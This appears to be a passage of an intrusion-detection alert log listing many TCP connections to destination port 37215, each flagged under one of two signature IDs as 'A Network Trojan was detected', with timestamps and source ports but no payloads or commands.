          Timestamp:06/08/24-15:05:29.062814
          SID:2835222
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267918
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466058
          SID:2835222
          Source Port:50472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850497
          SID:2835222
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887364
          SID:2829579
          Source Port:51328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548675
          SID:2835222
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041362
          SID:2835222
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901405
          SID:2829579
          Source Port:33468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174488
          SID:2829579
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601342
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787872
          SID:2829579
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462298
          SID:2829579
          Source Port:48532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2829579
          Source Port:56380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463708
          SID:2829579
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554782
          SID:2835222
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911521
          SID:2829579
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509744
          SID:2835222
          Source Port:55706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.443989
          SID:2829579
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446985
          SID:2829579
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241463
          SID:2829579
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510296
          SID:2835222
          Source Port:37744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552072
          SID:2829579
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554738
          SID:2835222
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731746
          SID:2835222
          Source Port:34542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466180
          SID:2829579
          Source Port:39472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022143
          SID:2835222
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353739
          SID:2835222
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160676
          SID:2829579
          Source Port:51988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887344
          SID:2829579
          Source Port:58054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178566
          SID:2829579
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058134
          SID:2829579
          Source Port:47088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274513
          SID:2835222
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740379
          SID:2829579
          Source Port:50138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273433
          SID:2829579
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782474
          SID:2835222
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732080
          SID:2835222
          Source Port:57842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897915
          SID:2829579
          Source Port:60970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444489
          SID:2835222
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896597
          SID:2835222
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901457
          SID:2829579
          Source Port:46462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403961
          SID:2835222
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274347
          SID:2829579
          Source Port:51574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746627
          SID:2835222
          Source Port:44232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175813
          SID:2835222
          Source Port:51978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168404
          SID:2835222
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806732
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601364
          SID:2835222
          Source Port:60354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890430
          SID:2829579
          Source Port:40898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236112
          SID:2835222
          Source Port:60174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241117
          SID:2829579
          Source Port:53198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180130
          SID:2835222
          Source Port:59112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893403
          SID:2835222
          Source Port:54280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410877
          SID:2829579
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241533
          SID:2835222
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155996
          SID:2829579
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099474
          SID:2829579
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257962
          SID:2829579
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127425
          SID:2829579
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911967
          SID:2835222
          Source Port:36926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107090
          SID:2829579
          Source Port:49240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514117
          SID:2835222
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177580
          SID:2829579
          Source Port:56096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442525
          SID:2829579
          Source Port:37156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734746
          SID:2829579
          Source Port:38424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786617
          SID:2835222
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815242
          SID:2835222
          Source Port:38666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177696
          SID:2835222
          Source Port:55744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671267
          SID:2829579
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239728
          SID:2829579
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296778
          SID:2835222
          Source Port:49666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407150
          SID:2829579
          Source Port:45122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787865
          SID:2835222
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237287
          SID:2835222
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738957
          SID:2829579
          Source Port:44946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405746
          SID:2835222
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738512
          SID:2829579
          Source Port:59084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035569
          SID:2829579
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444062
          SID:2835222
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729144
          SID:2829579
          Source Port:39062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445827
          SID:2835222
          Source Port:37334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449083
          SID:2829579
          Source Port:42430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897222
          SID:2835222
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112260
          SID:2835222
          Source Port:58262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511589
          SID:2829579
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236830
          SID:2835222
          Source Port:53862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242171
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043766
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860824
          SID:2835222
          Source Port:60124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185430
          SID:2829579
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739344
          SID:2829579
          Source Port:45196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894904
          SID:2829579
          Source Port:37864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273318
          SID:2829579
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731264
          SID:2835222
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2835222
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110755
          SID:2829579
          Source Port:38698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191653
          SID:2835222
          Source Port:47652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353548
          SID:2835222
          Source Port:47160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403256
          SID:2835222
          Source Port:46754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.294850
          SID:2835222
          Source Port:40974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067916
          SID:2835222
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019082
          SID:2835222
          Source Port:55546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099330
          SID:2829579
          Source Port:47102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353344
          SID:2835222
          Source Port:54500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891146
          SID:2829579
          Source Port:58634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179455
          SID:2829579
          Source Port:47554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784222
          SID:2835222
          Source Port:41318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055398
          SID:2835222
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554433
          SID:2829579
          Source Port:47050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745873
          SID:2835222
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861467
          SID:2829579
          Source Port:38044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496051
          SID:2829579
          Source Port:49248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810249
          SID:2829579
          Source Port:38180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021467
          SID:2835222
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
          SID:2829579
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747451
          SID:2829579
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797154
          SID:2835222
          Source Port:51014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730255
          SID:2835222
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895501
          SID:2835222
          Source Port:41580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276122
          SID:2829579
          Source Port:41784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151302
          SID:2829579
          Source Port:54332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463008
          SID:2835222
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351704
          SID:2835222
          Source Port:42610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237533
          SID:2829579
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176315
          SID:2835222
          Source Port:40940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733162
          SID:2835222
          Source Port:54000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173346
          SID:2835222
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603348
          SID:2829579
          Source Port:52262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449350
          SID:2829579
          Source Port:47438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176249
          SID:2835222
          Source Port:37130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463143
          SID:2835222
          Source Port:42612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153145
          SID:2829579
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792819
          SID:2829579
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078502
          SID:2835222
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456237
          SID:2829579
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442027
          SID:2835222
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461891
          SID:2835222
          Source Port:37760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128053
          SID:2835222
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599589
          SID:2835222
          Source Port:36554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165670
          SID:2829579
          Source Port:37212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730511
          SID:2829579
          Source Port:44138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859648
          SID:2829579
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180063
          SID:2835222
          Source Port:47968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853548
          SID:2829579
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129542
          SID:2829579
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130243
          SID:2835222
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731861
          SID:2835222
          Source Port:58910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796448
          SID:2829579
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599488
          SID:2829579
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014996
          SID:2835222
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884686
          SID:2835222
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154097
          SID:2829579
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509190
          SID:2835222
          Source Port:53258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731538
          SID:2835222
          Source Port:57512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177889
          SID:2829579
          Source Port:35336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704005
          SID:2835222
          Source Port:60556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799752
          SID:2829579
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162657
          SID:2829579
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462703
          SID:2829579
          Source Port:47246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854262
          SID:2829579
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461820
          SID:2829579
          Source Port:50976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020324
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819128
          SID:2835222
          Source Port:53478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409716
          SID:2835222
          Source Port:51992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460989
          SID:2835222
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263948
          SID:2835222
          Source Port:42338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269527
          SID:2835222
          Source Port:37814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274186
          SID:2829579
          Source Port:56190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154109
          SID:2835222
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.798608
          SID:2835222
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858201
          SID:2835222
          Source Port:49734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395952
          SID:2835222
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859419
          SID:2835222
          Source Port:52918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152333
          SID:2835222
          Source Port:58572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355008
          SID:2835222
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241236
          SID:2835222
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729909
          SID:2835222
          Source Port:54880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354940
          SID:2835222
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734516
          SID:2829579
          Source Port:36942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149869
          SID:2835222
          Source Port:47094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707622
          SID:2829579
          Source Port:51404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599387
          SID:2829579
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786347
          SID:2835222
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841693
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159848
          SID:2835222
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162590
          SID:2829579
          Source Port:38308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892561
          SID:2829579
          Source Port:47942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551590
          SID:2829579
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108086
          SID:2835222
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784334
          SID:2835222
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732095
          SID:2835222
          Source Port:38354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794776
          SID:2829579
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600874
          SID:2835222
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461094
          SID:2829579
          Source Port:38676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742599
          SID:2829579
          Source Port:52608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039634
          SID:2835222
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408267
          SID:2829579
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893553
          SID:2829579
          Source Port:41190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157484
